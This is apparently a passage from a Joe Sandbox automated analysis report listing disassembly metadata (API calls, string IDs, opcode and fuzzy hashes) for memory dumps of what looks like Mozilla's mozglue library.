                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                  • String ID:
                                                                  • API String ID: 706364981-0
                                                                  • Opcode ID: 73c555f479466ee6ef3e5d65f40bb69befa4450bd196f371bc4b173734b2b397
                                                                  • Instruction ID: dba2c85451f40604417e45dc21ddb599442a5ee7849553db894337a00316f525
                                                                  • Opcode Fuzzy Hash: 73c555f479466ee6ef3e5d65f40bb69befa4450bd196f371bc4b173734b2b397
                                                                  • Instruction Fuzzy Hash: D84172B1A002159FDB14CF68DD80BAE77E8BF45258F640628E825D7B94E734EA14C7E1
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(?,?,?,?,6C05B61E,?,?,?,?,?,00000000), ref: 6C05B6AC
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C05B61E,?,?,?,?,?,00000000), ref: 6C05B6D1
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C05B61E,?,?,?,?,?,00000000), ref: 6C05B6E3
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C05B61E,?,?,?,?,?,00000000), ref: 6C05B70B
                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C05B61E,?,?,?,?,?,00000000), ref: 6C05B71D
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C05B61E), ref: 6C05B73F
                                                                  • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C05B61E,?,?,?,?,?,00000000), ref: 6C05B760
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C05B61E,?,?,?,?,?,00000000), ref: 6C05B79A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                  • String ID:
                                                                  • API String ID: 1394714614-0
                                                                  • Opcode ID: 502ad7129a32af44002ba80f26a5d4117ac8c55087efbd729536e28f71a55c45
                                                                  • Instruction ID: b3939332c4349bd7c349f70b7796ff06b91ce4b88979ca004c4bc846c418cd0d
                                                                  • Opcode Fuzzy Hash: 502ad7129a32af44002ba80f26a5d4117ac8c55087efbd729536e28f71a55c45
                                                                  • Instruction Fuzzy Hash: 5341A2B2D001199FCB14DF68DD807AEB7F9BB44324F650629E825E7780E731BA148BE1
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(6C0D5104), ref: 6C05EFAC
                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C05EFD7
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C05EFEC
                                                                  • free.MOZGLUE(?), ref: 6C05F00C
                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C05F02E
                                                                  • memcpy.VCRUNTIME140(00000000,?), ref: 6C05F041
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C05F065
                                                                  • moz_xmalloc.MOZGLUE ref: 6C05F072
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                  • String ID:
                                                                  • API String ID: 1148890222-0
                                                                  • Opcode ID: 50fa6912f4c2fabbae430a2c9738d1b9325e50b9712195faa3839916b8f103e7
                                                                  • Instruction ID: 30c75970410d5870aaa93875bf1991254e4bb55692333fd5d3f6acd290edeaa8
                                                                  • Opcode Fuzzy Hash: 50fa6912f4c2fabbae430a2c9738d1b9325e50b9712195faa3839916b8f103e7
                                                                  • Instruction Fuzzy Hash: 1B41D9B1A001159FCB08CF68DD80AAE77E9FF88314B64462CE825D7794EB71E915C7E1
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C05EB57,?,?,?,?,?,?,?,?,?), ref: 6C08D652
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C05EB57,?), ref: 6C08D660
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C05EB57,?), ref: 6C08D673
                                                                  • free.MOZGLUE(?), ref: 6C08D888
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$memsetmoz_xmalloc
                                                                  • String ID: |Enabled$3JT/
                                                                  • API String ID: 4142949111-818738163
                                                                  • Opcode ID: 6be7387778ff062bedd58a239570f2604657c07e2c4acfb2970a10c826c8f5a1
                                                                  • Instruction ID: dc638c463c76dd588d69c873e3a709e069f3b47cb622792153d5571b2eff0084
                                                                  • Opcode Fuzzy Hash: 6be7387778ff062bedd58a239570f2604657c07e2c4acfb2970a10c826c8f5a1
                                                                  • Instruction Fuzzy Hash: E2A113B0A01309CFDF10CF69C4907AEBBF5AF49318F58815ED899AB741D730A945CBA1
                                                                  APIs
                                                                    • Part of subcall function 6C096060: moz_xmalloc.MOZGLUE(00000024,544A33E9,00000000,?,00000000,?,?,6C095FCB,6C0979A3), ref: 6C096078
                                                                  • free.MOZGLUE(-00000001), ref: 6C0972F6
                                                                  • free.MOZGLUE(?), ref: 6C097311
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$moz_xmalloc
                                                                  • String ID: 333s$333s$Copied unique strings$Spliced unique strings$3JT/
                                                                  • API String ID: 3009372454-1064117988
                                                                  • Opcode ID: e607cc0f953b203229c4461507b58ff87e9b96111f14d70135c60a0da9e30888
                                                                  • Instruction ID: fef84cf2d53aee0346c4a60cd898af8ade5004e64664e35e5cf2a943bc24bf2f
                                                                  • Opcode Fuzzy Hash: e607cc0f953b203229c4461507b58ff87e9b96111f14d70135c60a0da9e30888
                                                                  • Instruction Fuzzy Hash: 3D717272F006198FDB18CF6DC89079DB7F2AF88314F25812DD80AAB750DB31A946DB81
                                                                  APIs
                                                                  • free.MOZGLUE(?,?,?,6C0B7ABE), ref: 6C06985B
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C0B7ABE), ref: 6C0698A8
                                                                  • moz_xmalloc.MOZGLUE(00000020), ref: 6C069909
                                                                  • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C069918
                                                                  • free.MOZGLUE(?), ref: 6C069975
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 1281542009-0
                                                                  • Opcode ID: e79cf49624b78fc7573aa6cffcceac904886f3c161ac16dd377a4f8a6316cf93
                                                                  • Instruction ID: 52b101e57ac1553be2ea08eddd81a5c0ee9cb9974290068fdd79a8295922ee1a
                                                                  • Opcode Fuzzy Hash: e79cf49624b78fc7573aa6cffcceac904886f3c161ac16dd377a4f8a6316cf93
                                                                  • Instruction Fuzzy Hash: 0C7169746047058FC729CF2DC480A5AB7F1FF4A328B644AADD85A8BF90D771B845CBA1
                                                                  APIs
                                                                  • free.MOZGLUE(?), ref: 6C0A0270
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A02E9
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C0A02F6
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C0A033A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                  • String ID: about:blank$3JT/
                                                                  • API String ID: 2047719359-3286194741
                                                                  • Opcode ID: 3ba5db4f57074f07006022882443c4091299a80efeb3a191f136f68589ede3a4
                                                                  • Instruction ID: e2c74bb636a0332bd4a22c54f71e12b4c728dd278c764af76ea6860f060290d1
                                                                  • Opcode Fuzzy Hash: 3ba5db4f57074f07006022882443c4091299a80efeb3a191f136f68589ede3a4
                                                                  • Instruction Fuzzy Hash: 69519075A042198FCB00DF98C880B9EB7F5FF89318F648519D91AA7B42DB31F946CB90
                                                                  APIs
                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C0ACC83,?,?,?,?,?,?,?,?,?,6C0ABCAE,?,?,6C09DC2C), ref: 6C06B7E6
                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C0ACC83,?,?,?,?,?,?,?,?,?,6C0ABCAE,?,?,6C09DC2C), ref: 6C06B80C
                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C0ACC83,?,?,?,?,?,?,?,?,?,6C0ABCAE), ref: 6C06B88E
                                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C0ACC83,?,?,?,?,?,?,?,?,?,6C0ABCAE,?,?,6C09DC2C), ref: 6C06B896
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                  • String ID:
                                                                  • API String ID: 922945588-0
                                                                  • Opcode ID: bf989b80721d9d1cb1b4bb8573477f9cf01e305164624bb459981c0fb9721506
                                                                  • Instruction ID: f58b0c6288b38cdefa6469578790fdef3584d50071d628928e28d4961bff3774
                                                                  • Opcode Fuzzy Hash: bf989b80721d9d1cb1b4bb8573477f9cf01e305164624bb459981c0fb9721506
                                                                  • Instruction Fuzzy Hash: 09518F757006008FCB25CF5AC484B6ABBF5FF89318B69855DE98A87B51CB31EC01DB80
                                                                  APIs
                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C054E5A
                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C054E97
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C054EE9
                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C054F02
                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C054F1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                  • String ID: 3JT/
                                                                  • API String ID: 713647276-2178588373
                                                                  • Opcode ID: d48aefcde936ee22b74a2287debd11dc487319f80256db55d37d66003a0a3e41
                                                                  • Instruction ID: 192fc752737b30217800c6f620dd89e9b185d59d9918df5d96cf22272dfd92a2
                                                                  • Opcode Fuzzy Hash: d48aefcde936ee22b74a2287debd11dc487319f80256db55d37d66003a0a3e41
                                                                  • Instruction Fuzzy Hash: 2641C171608701AFC705CFA9C880A9BB7E4BF89344F908A1DF56597741DB31E974CB91
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09E12F
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C09E084,00000000), ref: 6C09E137
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C09E196
                                                                  • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C09E1E9
                                                                    • Part of subcall function 6C0999A0: GetCurrentThreadId.KERNEL32 ref: 6C0999C1
                                                                    • Part of subcall function 6C0999A0: AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C0999CE
                                                                    • Part of subcall function 6C0999A0: ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C0999F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [I %d/%d] WriteProfileToJSONWriter$3JT/
                                                                  • API String ID: 2491745604-511321019
                                                                  • Opcode ID: eddff4bb50234e814890e3344448884492493a0dbe2c6656b1cc389ea26ba1e1
                                                                  • Instruction ID: 7eee3a7210a45658da2a902227a71054dea1b3d2cd51e196344313fa759a2e4d
                                                                  • Opcode Fuzzy Hash: eddff4bb50234e814890e3344448884492493a0dbe2c6656b1cc389ea26ba1e1
                                                                  • Instruction Fuzzy Hash: 6D31D4B17057009FC7009F5984413AEF7E5AFCA708F14892EE9594BB81EB70EA19DB93
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C06C1BC
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C06C1DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1885715127-2178588373
                                                                  • Opcode ID: c7425fdc62fc068314b84998241b6dd9a64b6e8b0723755bd7bcb4656cbb2376
                                                                  • Instruction ID: c2b28b68690e2583995929dc1de1721d016d1731953e313d7fdcc720fa834849
                                                                  • Opcode Fuzzy Hash: c7425fdc62fc068314b84998241b6dd9a64b6e8b0723755bd7bcb4656cbb2376
                                                                  • Instruction Fuzzy Hash: CD41C2B1D083408FDB10DF65C48079AB7E4BF86708F41855DE9989BB12E730E548CBA3
                                                                  APIs
                                                                  • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C08F480
                                                                    • Part of subcall function 6C05F100: LoadLibraryW.KERNEL32(shell32,?,6C0CD020), ref: 6C05F122
                                                                    • Part of subcall function 6C05F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C05F132
                                                                  • CloseHandle.KERNEL32(00000000), ref: 6C08F555
                                                                    • Part of subcall function 6C0614B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C061248,6C061248,?), ref: 6C0614C9
                                                                    • Part of subcall function 6C0614B0: memcpy.VCRUNTIME140(?,6C061248,00000000,?,6C061248,?), ref: 6C0614EF
                                                                    • Part of subcall function 6C05EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C05EEE3
                                                                  • CreateFileW.KERNEL32 ref: 6C08F4FD
                                                                  • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C08F523
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                  • String ID: \oleacc.dll$3JT/
                                                                  • API String ID: 2595878907-1771166112
                                                                  • Opcode ID: f78dade4bb7d963b60b40fd6481eb05193d422bf7ee19325fb5cab0779f6ca0f
                                                                  • Instruction ID: 7f9f3ed28a9bb3306137417ac1905d40992a582e7e50443473a1ee87b429d762
                                                                  • Opcode Fuzzy Hash: f78dade4bb7d963b60b40fd6481eb05193d422bf7ee19325fb5cab0779f6ca0f
                                                                  • Instruction Fuzzy Hash: D441B4306097109FD720DF79D844B9BB7F8AF44318F504A1CF69483690EB70E549CB92
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C0CE330,?,6C07C059), ref: 6C0BAD9D
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C0CE330,?,6C07C059), ref: 6C0BADAC
                                                                  • free.MOZGLUE(?,?,?,?,00000000,?,?,6C0CE330,?,6C07C059), ref: 6C0BAE01
                                                                  • GetLastError.KERNEL32(?,00000000,?,?,6C0CE330,?,6C07C059), ref: 6C0BAE1D
                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C0CE330,?,6C07C059), ref: 6C0BAE3D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3161513745-2178588373
                                                                  • Opcode ID: 650406c12c6cdee77b4402840e3f57c09fe60dbdcd0b912812f2d22f8837ed46
                                                                  • Instruction ID: dde17adee9c6840b9ef9d589dcbcbd1453ec6c57fe343763ff3111128b3caaf3
                                                                  • Opcode Fuzzy Hash: 650406c12c6cdee77b4402840e3f57c09fe60dbdcd0b912812f2d22f8837ed46
                                                                  • Instruction Fuzzy Hash: 423141B1A002159FDB10DF798C44BAFB7F8EF49614F558429E85AE7700E734E804CBA1
                                                                  APIs
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0B0BBC
                                                                    • Part of subcall function 6C075C50: GetTickCount64.KERNEL32 ref: 6C075D40
                                                                    • Part of subcall function 6C075C50: EnterCriticalSection.KERNEL32(6C0DF688), ref: 6C075D67
                                                                  • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0B0BCA
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0B0BD5
                                                                    • Part of subcall function 6C075C50: __aulldiv.LIBCMT ref: 6C075DB4
                                                                    • Part of subcall function 6C075C50: LeaveCriticalSection.KERNEL32(6C0DF688), ref: 6C075DED
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0B0BE2
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6C0B0C9A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Time$StampV01@@Value@mozilla@@$CriticalSection$BaseCount64Creation@DurationEnterLeavePlatformProcessSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@__aulldiv
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3168180809-2178588373
                                                                  • Opcode ID: dd90d06a63e4eacec4925c7392196ce27ef8f2998e5955a1d32e71ea68e084d7
                                                                  • Instruction ID: fcde4002071857607ea310f40cfd1d3ecc314ec7f80e0351b1ca5d69f7cdd142
                                                                  • Opcode Fuzzy Hash: dd90d06a63e4eacec4925c7392196ce27ef8f2998e5955a1d32e71ea68e084d7
